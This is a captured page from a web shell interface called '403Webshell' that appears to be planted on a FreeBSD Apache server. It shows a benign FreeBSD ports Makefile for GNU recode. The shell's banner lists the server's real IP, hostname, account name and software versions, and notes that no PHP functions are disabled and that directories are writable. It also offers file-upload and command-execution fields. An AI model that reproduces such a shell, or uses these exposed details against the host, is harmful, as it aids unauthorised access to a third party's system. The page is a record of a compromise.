403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/converters/recode/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/converters/recode/Makefile
PORTNAME=	recode
PORTVERSION=	3.6
DISTVERSIONPREFIX=	v
PORTREVISION=	15
CATEGORIES=	converters

MAINTAINER=	demon@FreeBSD.org
COMMENT=	Converts files between character sets and usages
WWW=		https://www.gnu.org/software/recode/recode.html

LICENSE=	GPLv2+

USES=		gettext iconv libtool makeinfo perl5

USE_GITHUB=	yes
GH_ACCOUNT=	pinard
GH_PROJECT=	Recode

USE_LDCONFIG=	yes
USE_PERL5=	run build

GNU_CONFIGURE=	yes
CONFIGURE_ARGS=	--without-included-gettext
CPPFLAGS+=	-I${LOCALBASE}/include
LDFLAGS+=	-L${LOCALBASE}/lib ${ICONV_LIB}

INFO=		recode

post-extract:
	@${CP} ${FILESDIR}/ru.po ${WRKSRC}/i18n
	@${RM} ${WRKSRC}/doc/${PORTNAME}.info*

post-patch:
	@${REINPLACE_CMD} -E \
		'/Project-Id-Version/ { \
			s/3\.[45](r|\.[0-9])?/3.6/; \
			s/: (Free )?recode/: GNU recode/; }' \
		${WRKSRC}/i18n/*.po
	@${REINPLACE_CMD} 's,"iconv\.h","${ICONV_PREFIX}/include/iconv.h",' \
		${WRKSRC}/src/libiconv.c
	@${CP} ${WRKSRC}/lib/error.c ${WRKSRC}/src

# to enable, remove this line and the leading @: from the STRIP_CMD line
post-install:
	@: ${STRIP_CMD} ${STAGEDIR}${PREFIX}/lib/librecode.so.*.*.*

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit